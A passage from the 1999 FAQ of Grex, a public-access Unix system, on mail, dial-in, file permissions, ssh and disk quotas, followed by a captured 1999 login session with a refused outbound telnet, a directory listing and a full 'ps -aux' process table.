      your .forward file world readable, change to your home directory (type: cd)
      and then issue this command:
       
          chmod 644 .forward
       
      Your home directory must also be world accessible; type:
       
          chmod 755 .
       
      or use 711 instead of 755 if you don't want other people to be able to scan
      your directory.
       
      * How can I hide my forwarding address?
       
      You can't. If you have forwarding enabled, the address must appear in the
      finger command. There is no way to hide the address that
      you are forwarding to. Grex does not wish to provide anonymous remailing
      services. You may wish to make use of one of the
      anonymous remailers listed on the Yahoo page
      http://dir.yahoo.com/Computers_and_Internet/Security_and_Encryption/Anonymous_
      Mailers/.
       
      * How do I read mail with Netscape or Eudora?
       
      You can't. Those are POP clients, and Grex doesn't run a POP server. This is
      because Grex is intended to be an on-line community,
      and having a POP server would encourage people to use Grex as a mail drop
      instead, never logging on, and so never having a
      chance to become part of the Grex community. You must log in to Grex in order
      to read your mail.
       
      * My mailbox is getting heavily spammed. What can I do?
       
      Spam (unwanted mail) is unfortunately very common on the internet. Grex's mail
      transport system has numerous filters to reduce
      spam, but it does not eliminate it. The Grex staff may or may not be able to
      help you reduce the spam you are getting. The proper
      way to report spam is to forward a copy of one of the offending messages to
      abuse@cyberspace.org. Do not send multiple
      messages.
       
      The message you send MUST be accompanied by the full mail headers, so that we
      can determine its true origin. The origin of
      spam is often hidden, and may require detailed examination of these headers.
      If you use pine, you can view these headers with the
      "H" command.
       
      * Why is mail that I send to Grex getting rejected?
       
      This usually happens when the sending site is not configured properly.
      Problems in mail configuration can often lead to mail that
      has an invalid return address. Grex's mail system tries very hard to detect
      and reject invalid sending addresses, in order to reduce
      the amount of spam (unwanted mail) on Grex. If your mail looks like spam, then
      Grex will reject it. If you think this is happening to
      your legitimate mail, send a rejected copy of it to grex-staff@pmtech.com, and
      be sure to include all of the mail headers.
       
      Other common reasons for mail to Grex to be rejected are that it may be too
      large ( over 100k) or your mailbox may have grown too
      large (over 600k). Mail will be rejected in these cases.
       
      * Why does pine say that it cannot open my mail folder?
       
      Actually, that is probably just a faulty error message. For new accounts, it
      only means that you haven't received any mail yet. Once
      you receive some mail, the message should go away forever. We are working on
      getting rid of this error message.
       
      * How do I get pine to save my outgoing mail?
       
      This feature is turned off on Grex by default, because lots of new users were
      accumulating vast files of old mail without ever
      knowing that they were doing it. You're quite welcome to create the folder, as
      long as you keep an eye on your disk usage so that
      you don't exceed Grex's 1 megabyte limit for your account. To create your
      saved-mail folder, go into the pine configuration screen
      and look for the setting for "default-fcc". Set it to "saved-mail" or whatever
      name you would like to use. You need to use quotation
      marks around the file name.
       
      * How do I send attachments?
       
      Please do not send large attachments. If you have a small one, so that your
      mail remains under 100 K bytes in size, then you can
      send attachments from Grex.
       
      Once the file is in your home directory on Grex, then when composing a message
      in pine, put the file name on the attachments line.
      Please remember to delete the file after sending it as an attachment, so that
      you do not fill up your allotted disk space.
       
      * How can I view an attachment file named myfile.doc?
       
      Any file that ends with ".doc" is probably a Microsoft Word file. There is no
      way to view such a file on Grex. You will have to
      download that file to a computer that has Microsoft Word or some other word
      processor that can import such files.
       
      * How can I set the "From" header in pine for my outgoing mail?
       
      In Pine on Grex, you can't set the "From:" field. This is disabled because
      there were too many problems with people setting invalid
      addresses, which caused their outgoing mail to bounce to the postmaster
      whenever it was undeliverable.
       
      * How do I set up a mailing list here?
       
      You can't. We're sorry, but this is not permitted. You can only forward mail
      to a single site elsewhere on the internet. Mailing lists are
      too resource intensive for Grex to support. You may wish to try using an
      advertising-based free mailing list service. The Free Center
      maintains a rated list of free mailing list providers.
       
      * Is it OK to collect my mail by FTP?
       
      Yes, but you must do it correctly.
       
      It is a extremely risky to attempt to transfer your mail spool file directly
      off of Grex by FTP. You risk losing some or all of your
      collected mail, because the FTP daemon does not participate in the locking
      scheme used by the mail delivery programs on Grex. In
      addition, your account may appear to be abandoned because FTP connections do
      not update the date of last login. This could
      result in loss of your account if it is the only way you use Grex.
       
      Instead, we recommend telnetting to Grex and running a mail client program.
      These all do participate in the locking mechanism for
      the mail spool. Collect all of your mail into a file in your home directory,
      and then log out. You may now safely fetch that file in your
      home directory by FTP. Please remember to delete it once it has been safely
      transferred.
       
      * Why can't I get procmail to work?
       
      Procmail is a mail filtering program, but it stopped working when Grex
      reorganized its mail system to use hierarchical mail
      directories. Grex really needs to have the mail organized hierarchically
      because of the very large number of users receiving mail.
      We hope to see procmail restored some day, but at the moment it is broken, and
      no schedule has been established for correcting it.
       
      * Can I set up an autoresponder to answer my mail while I am away for a while?
       
      Yes. Try the vacation program. The instructions can be found by typing "man
      vacation".
       
      ----------------------------------------------------------------------------
       
      Dialing In
       
      * How can I dial into Grex?
       
      The short answer is to dial (734) 761-3000 with your terminal software set to
      8-N-1. This process is described in detail in Grex's
      dial-up access information page.
       
      * If Grex doesn't answer the phone, how many times should I let it ring?
       
      We try very hard to keep all of the modems working properly, but sometimes,
      you may encounter a failure. Grex's phone lines are all
      configured so that if one modem doesn't answer after 3 rings, you are
      automatically transferred to the next line in the trunk hunt. If
      there happens to be a stuck modem, you need to wait at least 4 rings before a
      second one gets a chance to work. If there are two
      bad modems, then 7 rings are required.
       
      * If I can't get on by calling (734) 761-3000, is there another number I can
        try?
       
      No. Grex used to publicize other numbers in the interior of the hunt group,
      but there is no longer any advantage to calling any other
      number, because of this automatic stepping feature. Even if Grex is down, the
      phone should pick up once it steps past any bad
      modems. If it is down for an extended period, you should receive a short
      explanation from the terminal server. If the terminal server
      has failed, or the power to Grex's building has failed, the phones will not
      answer, but these conditions are very rare.
       
      * Why can't I get file transfer to work except for small files?
       
      Probably because you don't have a modem cable that is capable of handling
      hardware flow control, or your modem doesn't support
      it or has the feature turned off.
       
      ----------------------------------------------------------------------------
       
      Privacy, Encryption, and Security
       
      * My personal information should be private. Why is it shown?
       
      When you look up your own user information, you can always see it, even if it
      is set up so that nobody else on the system can see it.
      To see what other people see, ask for the info about
      "youraccount@cyberspace.org" instead of just "youraccount".
       
      * How can I keep private the place I'm logged on from?
       
      This is considered public information on Grex. The only way to hide it is not
      to log on.
       
      * I am receiving unwanted chat requests. What can I do?
       
      You can adjust the chat settings for your account with the "change" command.
      To run it, type "change" at a shell prompt, or
      "!change" from a menu or from PicoSpan. Then choose "W) Write settings" and
      follow the menus from there. You can: turn off all
      chat requests, accept all chat requests, or select which users can and cannot
      chat with you.
       
      * How can I view my friend's files?
       
      Grex is a very open system, so directories are open to the public unless the
      owner decides to make them private. E-mail, however,
      is automatically saved in private files that the world cannot see.
       
      To permit a file so that it can be seen by others, type
       
          chmod a+r file-name
       
      To permit a directory, type
       
          chmod a+rx dir-name
       
      To hide a file or directory, type
       
          chmod ou-rx file-or-dir-name
       
      If you hide your home directory completely, neither mail forwarding nor web
      hosting will be available to you. You may make your
      directory accessible without being allowing it to be scanned. This is how:
       
          chmod 711 dir-name
       
      * Can I run PGP on Grex to protect my e-mail messages from being seen by
        others?
       
      No. PGP is not available on Grex for a number of reasons. The two most
      compelling reasons are that it would not be legal, and it
      would not offer you the protection you seek. We would like to see it be
      legally available to all, but in order to be effective, PGP must
      be installed on your own computer, not on Grex. Encrypting or decrypting a
      message on Grex would mean that the message would
      have to travel over an insecure network in plaintext before encryption or
      after decryption, and this is not the way to protect your
      message.
       
      In order to install PGP on your home computer, North American users should go
      to the MIT PGP Distribution Site at
      http://web.mit.edu/network/pgp.html, and all other users should use the
      international PGP home page at http://www.ifi.uio.no/pgp/.
       
      * Do you provide secure shell?
       
      Yes, we do. Secure shell (ssh) is a good way to connect because your session
      is encrypted, so that passwords cannot be
      intercepted by sniffers. Unfortunately, it is not fully functional on Grex,
      because the ssh daemon is unable to wait in line with telnet
      users when there is a queue, so ssh connections will fail when the system is
      full. You may see a message like this when it fails:
       
          Warning: no access to tty (Bad file number).
       
      When there is no queue you can use ssh to connect to Grex without any
      trouble..
       
      ----------------------------------------------------------------------------
       
      Programming
       
      * How do I compile a program?
       
      To compile a C program named foo.c, type gcc foo.c -o foo. This compiles foo.c
      and creates an executable program
      named foo. To run it, type ./foo Likewise, to compile a C++ program named
      foo.cpp, type g++ foo.cpp -o foo
      Please check with the Grex staff before compiling programs you bring in from
      the net. Most of the useful programs are already
      installed here, and many others will not run on Grex, but compiling them on
      Grex wastes a lot of bandwidth and cpu time 
      resources that Grex is short on.
       
      * Why can't I get the C compiler to compile my program?
       
      Probably you are using the wrong C compiler. Grex has two compilers installed.
      cc is only used for building certain system
      executables. It is not ANSI standard, and it lacks certain standard include
      files. You need to use gcc instead. This is a fairly recent
      version of the Gnu C compiler. It is ANSI standard and very complete.
       
      * I compiled my program. Why won't the system run it?
       
      Usually this is because the program is not on your path. Unlike a DOS or
      Windows system, on Unix the current directory is not
      automatically placed on your path. So if you compile a program named foo, you
      cannot run it by just typing "foo". You need either to
      place the executable somewhere on your path, or to precede its name with ./
      (dot-slash) so you would type "./foo".
       
      * Can I install a "Bot"? Talker? Ircd? Mud? Mush? Muck? Moo?
       
      No. These are all servers, daemons, or programs that remain running after you
      have logged out. No program run by users is
      allowed to run after you log out. See the Grex Eggdrop Page from the Grex
      Staff Notes.
       
      At one time or another, the possibility of our installing some of these as
      official services has been discussed in the "coop"
      conference. We have never yet decided to do so, but if you are interested in
      pursuing this possibility, the Grex coop conference is
      the place to make your request.
       
      * Can I have a copy of Grex's newuser program?
       
      Yes, you can find out more about newuser, including availability, on this web
      page: http://www.cyberspace.org/~mdw/newuser.html.
       
      * Can I have a copy of Grex's write/chat/tel programs?
       
      Yes, you can find out more about write/chat/tel, including availability, on
      this web page: http://www.wwnet.net/~janc/write.html.
       
      * Can I have a copy of Grex's party program?
       
      Yes, you can find out more about party, including availability, on this web
      page: http://www.wwnet.net/~janc/software.html.
       
      ----------------------------------------------------------------------------
       
      Miscellaneous
       
      * Why does my browser say "Can't find application" when I click on the "Telnet
      In" link?
       
      You need to configure your browser to find your telnet application program.
      The exact instructions for doing this vary widely
      depending upon both your operating system and your browser. In Netscape 3 this
      setting can be found in "Options"/"General
      preferences"/"Applications". Select the telnet application that came with your
      system, or one you downloaded from the internet. For
      more details about telnet applications, see the Grex Telnet Information page
      at http://www.cyberspace.org/telnet.html.
       
      * When I try to telnet to Grex, it hangs. Why can't I connect?
       
      There are several things that can go wrong.
       
        o You don't have DNS working properly. In this case you can connect to Grex
          by using its IP address. See below.
        o You are accessing the net via a firewall which blocks telnet. In this case
          you need to contact your security administrator for the
          LAN which you are accessing the net from, and ask if there is a way to
          telnet through the firewall.
        o Your telnet client is not working properly. You would not be able to
          telnet to any other site, either. Have you tried any? Try
          telnetting to hvcn.org and see if you get a login prompt.
        o Grex is down. This happens occasionally. You can usually tell if Grex is
          down by trying to access the web site. Try reloading
          to eliminate the possibility of a cached page. This won't be a good test
          if your connection uses a caching proxy server.
        o If it is none of the above, send mail to The Grex Staff and explain
          everything you tried, and also please specify the IP address
          and the GMT time that your attempt failed. If you can provide the results
          of a ping or traceroute from your end, that may prove to be helpful, too.
       
      * Can I do a ping or traceroute from Grex?
       
      These tools are not available on Grex. Vandals were using them to attack other
      sites. This is a ludicrous thing to do from Grex,
      because Grex is so tiny that its CPU and net connection become overloaded long
      before any other system would even begin to
      notice that it was being attacked. But people were doing it anyway, and
      hurting Grex. Regrettably, the actions of a few thoughtless
      people has forced Grex to disable these potentially valuable network analysis
      tools.
       
      You may be able to use a remote traceroute server on the web. See
      http://www.traceroute.org/.
       
      * What is Grex's IP address?
       
      At the time this answer was last updated, the IP address of Grex was
      204.212.46.130, IP addresses may change at any time. In
      general we have little control over changes to our IP address. You should
      always use the hostname, because if the IP address does
      change, the DNS (Domain/Name Service) lookup of the hostname should produce
      the new IP address. If you unsure if a problem is
      due to DNS, you can test to see if you can connect using our IP address.
      However, if you can, it is strongly recommended that you
      resolve the problem you are having with DNS, so that you do not have to rely
      on inherently unreliable IP addresses.
       
      * Why does the "who" command show numeric IP addresses for some users?
       
      That is because this information is stored in a file (utmp) which only permits
      16 characters of storage for this information. If the IP
      address exceeds 16 characters when converted to text form, then it is stored
      (and reported) only in its numeric form. This affects
      other commands besides the "who" command, such as the "finger" and "last"
      commands.
       
      * How much disk space can I use and how can I determine how much I am using?
       
      We ask folks to keep their disk usage under a megabyte. You can find out how
      much disk space you are using (in kilobytes) by
      running the following command in your home directory:
       
          du -sk
       
      The number that comes back is the number of kilobytes of disk you are using.
      If you are using more than 1024, please remove files.
       
      If you are thinking of putting something big in your account, please talk to
      the Grex staff (staff@cyberspace.org) first. There aren't
      many good reasons to put big things in your Grex account: Grex doesn't allow
      multimedia files on its web pages (not even gifs and
      jpegs), and most of the useful programs that will actually run on Grex are
      already installed on Grex. So please talk to the staff first.
       
      * Why doesn't my arrow key work, so I can edit previous commands in sh?
       
      This is because Grex is running a real sh, and that is a feature not supported
      by sh. What some Unix systems call sh is actually
      bash, an enhanced version of the sh shell which does this. If you would like
      to use bash instead, you should change your shell on
      Grex to bash. You can do that by running the change command.
       
      * Why can't I edit previous commands in tcsh? It is supposed to support it.
       
      Tcsh does support previous line editing. Emacs conventions for command-line
      editing is the default at most sites, though Grex uses
      vi as the default for command-line editing. So you have two options: If you
      are handy with vi, hit escape to jump into command
      mode, then start editing your line as you would with vi. The second option is
      to type
       
          set -o emacs
       
      at the prompt. After that, you should be able to edit your command line in a
      way that is familiar to you. If you prefer to always use
      emacs as your command-line editor, then you'll want to place the "set -o
      emacs" line in your .login file.
       
      * Why does the last line of each page of text disappear from the screen before
      I can read it?
       
      This happens when Grex doesn't know how many rows of text are on your screen.
      The easiest way to set this correctly is to run the
      "change" program on Grex. It will count rows for you and display the correct
      number at the top of your screen (sometimes it can take
      some fiddling to figure out whether your screen has 48 or 49 or 50 rows), and
      make the necessary changes to your startup files so
      that your settings will be right in the future. To run the change program,
      type "change" at a shell prompt, or "!change" from a menu or
      PicoSpan. Then select "change terminal type" and follow the menus from there.
       
      * Why do the bottom lines stay on the screen in the editor while the rest
      scroll normally?
       
      Same problem. Wrong number of lines in the setting. See solution above.
       
      * Why doesn't "screen" work when I disconnect from Grex?
       
      Grex runs a special daemon that kills all user processes when a user logs out.
      This prevents users from running servers or robots of
      any kind. It also prevents them from using the reconnect feature of screen
      (although the other features work fine). The reason for this
      policy is to prevent users from consuming our limited resources while not
      logged in.
       
      * I found a huge core file in my account. What should I do?
       
      Nothing really. This is a file that gets created if a program fails (crashes).
      It is intended to help the programmer find whatever bug
      caused the failure. If not renamed, these files will be deleted automatically
      in a day or two. You can delete it if you wish. By the way,
      a core file usually doesn't take up as much space on the disk as it appears
      to, because it is "sparse" (full of empty space).
       
      * How does the system decide where to put my home directory?
       
      Grex uses a hierarchical arrangement of home directories to keep the directory
      sizes from growing too large and thus becoming
      inefficient. So, on Grex, home directories are always located by a path of
      this form:
       
          /x/y/z/username
       
      The x is the disk letter, the y is the first letter of the username, and the z
      is the second letter of the username. Currently we have two
      disks that user accounts occupy, /a and /c (/b was not available). When we add
      a third disk, some users will be assigned on /d. The
      choice of disk is determined when your account is created, and this choice is
      switched back and forth manually by the staff to keep
      the available disk space balanced.
       
      The environment variable $HOME should always be set to the full path of your
      home directory. The ~ symbol may also be used as a
      shorthand for your home directory, as long as your shell supports it. (The
      Bourne Shell does not.)
       
      * Where can I get a self-contained multi-user chat program for my linux box?
       
      You might want to try out Grex's party program. See the Party Question in this
      FAQ.
       
      * I know something about Unix. How can I help the Grex staff?
       
      We are always delighted to have new volunteers One of the things that Grex
      needs most urgently is more people to answer "write
      help" requests. It is recommended that you check out the helpers conference.
      To turn on your helper flag, run the Unix command
      "mesg -h y".
       
      Also you should read the Grex Staff Note on the topic of volunteering to be on
      the Grex staff.
       
      ----------------------------------------------------------------------------
      Last updated January 17, 1999 (srw)
      > telnet 24.112.43.46
       
      Sorry!  You need to be a *validated member* of Grex to use outbound internet
      services, including ftp and telnet, to connect to anything other than Grex
      itself.  To find out how to become a *member*, type "support" (without the
      quotes) at almost any prompt, or !support at the telnet or ftp prompt.
      To become a *validated* member, either pay for your membership with a personal
      check, or include a photocopy of a driver's license or other official ID along
      with your membership payment, or send mail to aruba (Grex's treasurer) to work
      out some other way of identifying yourself.  Membership costs $6/month - cheap!
       
      Grex has lots of options that are available to non-members.  Try typing
      "bbs" to join the conferences, or "menu" or "lynx" for two different menu
      systems that help you to find many options that you *can* use.
       
      If you have questions about Grex, you can find answers by joining the Info
      conference.  (Type "bbs info" to get there).  Or send mail to "staff".
       
      Thanks for trying out Grex!
       
      Trying 24.112.43.46 ...
      telnet: connect: Permission denied
      /usr/local/grex-scripts/.inet_real/telnet> exit
      ?Invalid command
      /usr/local/grex-scripts/.inet_real/telnet> ls
      ?Invalid command
      /usr/local/grex-scripts/.inet_real/telnet> open
      (to) 244^H^H
      2: unknown host
      /usr/local/grex-scripts/.inet_real/telnet> open
      (to) 244.1^H^H^H^H
      2: unknown host
      /usr/local/grex-scripts/.inet_real/telnet> p
      ?Invalid command
      /usr/local/grex-scripts/.inet_real/telnet> open
      (to) 24.112.43.46
      Trying 24.112.43.46 ...
      telnet: connect: Permission denied
      /usr/local/grex-scripts/.inet_real/telnet> close
      ?Need to be connected first.
      /usr/local/grex-scripts/.inet_real/telnet> quit
      > exit
      logout
       
      Grex central timekeeping.  At the beep, the time is
       6:26PM on Tuesday, 19 October 1999
       
      New to grex?  Type help at the login prompt
       
       
      Grex central timekeeping.  At the beep, the time is
       6:20PM on Tuesday, 19 October 1999
       
      New to grex?  Type help at the login prompt
       
      (ttys3) grex login: ccc
      ccc's Password:
      Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com.
       
            Happy Birthday to Jishnu Nair (atticus's baby)!
       
      Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.112.43.46
      No mail.
      Type 'bbs' to see what Grex is all about!
      Type 'change' to change your settings.
      Type 'faq' to see answers to frequently asked questions.
      > ls -laFF
      total 10
      drwxr-xr-x   2 ccc      populus       512 Oct 19 18:14 ./
      drwxr-xr-x  16 root     wheel         512 Oct 19 18:13 ../
      -rw-r--r--   1 ccc      populus      1159 Oct 19 18:15 .agora31.cf
      -rw-r--r--   1 ccc      populus       778 Oct 19 18:13 .cfonce
      -rw-r--r--   1 ccc      populus       664 Oct 19 18:13 .cshrc
      -rw-r--r--   1 ccc      populus       718 Oct 19 18:13 .login
      -rw-r--r--   1 ccc      populus      1245 Oct 19 18:13 .mailrc
      -rw-------   1 ccc      populus       360 Oct 19 18:13 .plan
      > ps -aux
      USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
      ccc      13349 76.8  0.2  296  528 s3 R    18:21   0:03 ps -aux
      mikeaa   13347 30.8  0.1   36  264 t1 S    18:21   0:00 /usr/local/lib/gcc-lib/s
      root     13353 24.3  0.2  288  460 ?  S    18:21   0:00 sendmail: SAA13353 major
      mikeaa   13341  8.7  0.1   44  252 t1 S    18:21   0:00 /usr/local/bin/gcc.real
      root       152  8.3  0.0   12    8 ?  S    Oct 10521:55 update
      root     13352  3.9  0.1  120  264 t7 S    18:21   0:00 login -h 208.135.167.19
      root      7712  0.6  0.0   56   60 ?  S    17:39   0:05 telnetd ttyq3 207.91.203
      ccc      13228  0.5  0.3  264  732 s3 S    18:20   0:02 -tcsh (tcsh)
      root     13148  0.4  0.2   56  440 ?  S    18:20   0:02 telnetd ttyt7 208.135.16
      root        91  0.0  0.1   60  168 ?  S    Oct 10174:57 syslogd
      root        98  0.0  0.0  240   88 ?  S    Oct 10 32:13 sendmail: accepting conn
      root       112  0.0  0.0  136    0 ?  IW<  Oct 10 46:40 /usr/local/sbin/robocop
      root       102  0.0  0.0   60    0 ?  IW   Oct 10  0:01 rpc.statd
      daemon      62  0.0  0.0   56  112 ?  S    Oct 10 17:50 /usr/local/libexec/portm
      root     11493  0.0  0.0   56    0 ?  IW   18:10   0:02 telnetd ttyua 139.92.170
      root     10374  0.0  0.0   56   60 ?  S    18:02   0:19 telnetd ttyu1 204.212.46
      root       111  0.0  0.0  100    0 ?  IW   Oct 10103:12 /usr/local/sbin/idled
      root       113  0.0  0.0   24    0 ?  IW   Oct 10  0:00 /bin/sh /usr/local/Hughe
      root       105  0.0  0.2  140  448 ?  S    Oct 10 13:12 /usr/local/libexec/httpd
      hrcfan   11774  0.0  0.0  264    0 t2 IW   12:03   0:02 -tcsh (tcsh)
      root     13257  0.0  0.2  316  560 ?  S    18:20   0:00 sendmail: SAA13245 tilma
      root      1439  0.0  0.0   40    0 co IW   Oct 14  0:00 - std.9600 console (gett
      root     12376  0.0  0.2   56  436 ?  S    18:16   0:08 telnetd ttyr0 204.212.46
      cfadm    11371  0.0  0.0   96    0 q8 IW   18:09   0:02 /usr/local/bin/bbs
      msql       127  0.0  0.0  140    0 ?  IW   Oct 10276:15 /usr/local/Hughes/bin/ms
      root      3932  0.0  0.0   56    0 ?  IW   17:12   0:07 telnetd ttyr9 148.233.86
      janko     6567  0.0  0.2  144  504 r1 S    17:31   0:03 -bash (bash)
      root     12330  0.0  0.0  252    0 ?  IW   18:16   0:00 sendmail: server webpers
      root        84  0.0  5.01223212424 ?  S    Oct 10251:18 /usr/local/libexec/named
      richard  10202  0.0  0.0   36   56 pe S    18:01   0:00 watch ...
      root        71  0.0  0.0   36   52 ?  S    Oct 10  4:22 in.routed
      msql       126  0.0  0.0   52    0 ?  IW   Oct 10  0:00 /bin/csh -c /usr/local/H
      cfadm     2686  0.0  0.0  128    0 pe IW   17:02   0:06 /usr/local/bin/bbs
      root     11820  0.0  0.0  240    0 ?  IW   18:12   0:05 /usr/local/libexec/sshd
      ryan     12429  0.0  0.0  160    0 q5 IW   18:16   0:00 tcsh -c /a/r/y/ryan/pfil
      thea     10449  0.0  0.1 1264  300 u1 S    18:02   0:18 pine
      root       164  0.0  0.1   52  168 ?  S    Oct 10  8:06 cron
      root       219  0.0  0.0   40    0 b  IW   Oct 10  0:00 - std.9600 ttyb (getty)
      suchit     360  0.0  0.0  152    0 pa IW   16:43   0:07 -bash (bash)
      fb2      13125  0.0  0.0   36    0 ua IW   18:20   0:00 /bin/sh /b
      root     29495  0.0  0.0   40    0 ?  IW   06:01   0:00 in.ntalkd
      nobody   10684  0.0  0.3  216  628 ?  S    18:04   0:09 /usr/local/libexec/httpd
      root         2  0.0  0.0    0    0 ?  D    Oct 10  1:06 pagedaemon
      root     12583  0.0  0.2  328  524 ?  S    18:17   0:02 sendmail: RAA04763 serve
      mystar   28951  0.0  0.0   68    0 tf IW   16:31   0:02 -csh (csh)
      joe      13260  0.0  0.1   48  128 t8 S    18:20   0:00 /bin/sh /usr/local/bin/m
      root         1  0.0  0.0   52   20 ?  S    Oct 10  5:23 /sbin/init -
      root     11752  0.0  0.0   56    0 ?  IW   12:03   0:17 telnetd ttyt2 130.126.16
      mbollman 11691  0.0  0.0   72    0 p7 IW   18:12   0:01 -ksh (ksh)
      skymoon  10789  0.0  0.0   68    0 s8 IW   18:04   0:02 -csh (csh)
      root      2089  0.0  0.0   56    0 ?  IW   16:59   0:34 telnetd ttyu9 164.76.51.
      metgod   11225  0.0  0.0   68    0 t9 IW   18:07   0:01 ksh
      mikeaa   13340  0.0  0.0   72  112 t1 S    18:21   0:00 /bin/sh ./configure
      ya       10199  0.0  0.0   68    0 tc IW   18:01   0:02 -csh (csh)
      hrcfan   11415  0.0  0.0  184    0 t2 IW   18:09   0:01 elm
      root     10939  0.0  0.0   56   56 ?  S    18:05   0:09 telnetd ttyqd 198.182.64
      party    11972  0.0  0.1   72  328 t3 S    18:14   0:02 /usr/local/bin/party_
      root     28089  0.0  0.0   56    0 ?  IW   16:25   0:03 telnetd ttyte gate1.lci.
      jiffer   26209  0.0  0.0  264    0 r3 IW   16:12   0:02 -tcsh (tcsh)
      jackal   10326  0.0  0.0   48    0 rc TW   18:01   0:00 /bin/sh /usr/local/bin/m
      root     13199  0.0  0.2   56  436 ?  S    18:20   0:01 telnetd ttyt8 152.207.13
      root     28934  0.0  0.0   56   60 ?  S    16:31   0:13 telnetd ttytf 207.220.20
      meme      9643  0.0  0.0   68    0 tb IW   17:56   0:01 -csh (csh)
      nats      7089  0.0  0.0  172    0 q7 IW   17:35   0:01 elm
      root     10914  0.0  0.0   56   60 ?  S    18:05   0:06 telnetd ttypc 207.91.203
      root     13344  0.0  0.1  252  280 ?  S    18:21   0:00 sendmail: server tfabbs.
      root     11314  0.0  0.0   56    0 ?  IW   18:08   0:02 telnetd ttys4 24.48.58.2
      jackal   12828  0.0  0.0   36    0 rc TW   18:18   0:00 more -d
      root     10542  0.0  0.0   56    0 ?  IW   18:03   0:03 telnetd ttyq2 204.212.46
      root      7495  0.0  0.0   24    0 ?  IW   Oct 11  1:14 ./mdaemon -d
      root     11216  0.0  0.0   56    0 ?  IW   18:07   0:01 telnetd ttyt9 216.101.22
      archer    4089  0.0  0.0   48    0 r9 IW   17:13   0:00 /bin/sh /usr/local/bin/m
      root     11466  0.0  0.0   96    0 ?  IW   Oct 16  0:01 egrep USER|STOR|RETR|LIS
      root     22696  0.0  0.0   56    0 ?  IW   Oct 14  1:35 telnetd ttyu5 141.211.16
      root     11113  0.0  0.0   56    0 ?  IW   18:06   0:02 telnetd ttys0 198.108.22
      root     12296  0.0  0.0   56   60 ?  S    18:16   0:02 telnetd ttyq5 4.17.192.3
      robnoiz  11194  0.0  0.0  316    0 s0 IW   18:07   0:01 pine
      sekharg  10067  0.0  0.0   68    0 qb IW   17:59   0:01 -csh (csh)
      pfv      10343  0.0  0.0   36   56 u2 S    18:01   0:00 watch ...
      prime    11619  0.0  0.0   56    0 pc IW   18:11   0:01 -csh (csh)
      jazz       131  0.0  0.0  232    0 r2 IW   16:40   0:01 -tcsh (tcsh)
      pizo56   13130  0.0  0.2  800  516 ?  S    18:20   0:02 ftpd: quincy-ip-15-99.dy
      root      9885  0.0  0.0   56   60 ?  S    17:58   0:06 telnetd ttysa 198.182.64
      root     13275  0.0  0.2  300  388 ?  I    18:20   0:00 sendmail: SAA13263 f298.
      bebbe346 10528  0.0  0.0   48    0 t4 TW   18:02   0:00 mail pine
      nobody   11637  0.0  0.3  216  644 ?  S    18:11   0:04 /usr/local/libexec/httpd
      party     8477  0.0  0.1   72  328 t5 S    17:45   0:04 /usr/local/bin/party_
      root     11465  0.0  0.1   36  140 ?  S    Oct 16 14:41 tail -f /var/log/ftp.log
      wild     10942  0.0  0.0   40    0 qd IW   18:05   0:00 /bin/sh /b
      coop     16853  0.0  0.0  156    0 p4 IW   Oct 17  0:01 -bash (bash)
      saloon   10241  0.0  0.0  148    0 u0 IW   18:01   0:06 -bash (bash)
      root      2308  0.0  0.0   56    0 ?  IW   Oct 18  0:03 telnetd ttyp6 206.189.24
      root     14496  0.0  0.1   28  180 ?  S    12:25   0:12 in.comsat
      root     11920  0.0  0.0   56   60 ?  S    18:13   0:05 telnetd ttyt3 204.212.46
      root      9629  0.0  0.0   56   60 ?  S    17:55   0:16 telnetd ttytb 171.64.15.
      senna    29517  0.0  0.0   36    0 ue IW   16:36   0:02 watch ...
      root      6538  0.0  0.0   56   60 ?  S    17:31   0:07 telnetd ttyr1 158.193.82
      cfadm    11132  0.0  0.0   96    0 s0 IW   18:07   0:01 /usr/local/bin/bbs
      cfadm    11978  0.0  0.0  128    0 u5 IW   Oct 17  0:51 bbs staff
      wild     10963  0.0  0.0   48    0 qd IW   18:06   0:00 /bin/sh /usr/local/bin/m
      jackal   13021  0.0  0.0   40    0 rc IW   18:19   0:00 /bin/sh /usr/local/lib/m
      wasf     12094  0.0  0.0   68    0 q6 IW   18:15   0:01 -csh (csh)
      archer    3951  0.0  0.0   68    0 r9 IW   17:12   0:01 -csh (csh)
      root     12506  0.0  0.0   56    0 ?  IW   18:17   0:02 telnetd ttyu8 198.133.22
      jackal   13077  0.0  0.1   36  200 rc S    18:19   0:01 more -d
      root     10170  0.0  0.0   56    0 ?  IW   18:00   0:04 telnetd ttytc 163.121.88
      meme      9670  0.0  0.2  680  388 tb S    17:56   0:13 pine
      senna    29426  0.0  0.0   68    0 ue IW   16:35   0:01 -csh (csh)
      pfv      10305  0.0  0.0  260    0 u2 IW   18:01   0:02 -tcsh (tcsh)
      somesh   11383  0.0  0.0  380    0 s4 IW   18:09   0:01 lynx -cookies quote.yaho
      root     11906  0.0  0.0   56    0 ?  IW   18:13   0:05 telnetd ttysb 63.23.174.
      somesh   11322  0.0  0.0  264    0 s4 IW   18:08   0:01 -tcsh (tcsh)
      nobody   11899  0.0  0.3  216  664 ?  S    18:13   0:01 /usr/local/libexec/httpd
      root     29405  0.0  0.0   56   60 ?  S    16:35   0:06 telnetd ttyue 3com1a94.r
      krj      25504  0.0  0.0   56    0 q1 IW   16:09   0:01 -csh (csh)
      jackal   12792  0.0  0.0   40    0 rc TW   18:18   0:00 /bin/sh /usr/local/lib/m
      roelof   11869  0.0  0.0  264    0 p5 IW   18:13   0:03 -tcsh (tcsh)
      jackal   12830  0.0  0.0 1104    0 rc TW   18:18   0:00 sort
      root      8362  0.0  0.0   56   56 ?  S    17:44   0:04 telnetd ttyt5 202.56.224
      root     10766  0.0  0.0   56    0 ?  IW   18:04   0:04 telnetd ttys8 196.3.65.9
      nes16    10550  0.0  0.0   68    0 q2 IW   18:03   0:00 -csh (csh)
      root      7216  0.0  0.0   36  100 ?  S    20:57   3:02 tail -f /var/log/ftp.log
      root     12079  0.0  0.0   56   60 ?  S    18:14   0:03 telnetd ttyq6 front0.cpl
      tlaff    11081  0.0  0.0   40    0 td IW   18:06   0:00 /bin/sh /usr/local/lib/m
      nobody   10600  0.0  0.3  216  696 ?  S    18:03   0:05 /usr/local/libexec/httpd
      tlaff    11061  0.0  0.0   48    0 td IW   18:06   0:00 /bin/sh /usr/local/bin/m
      nobody    8285  0.0  0.0   32    0 ?  IW   Oct 11  0:01 fingerd
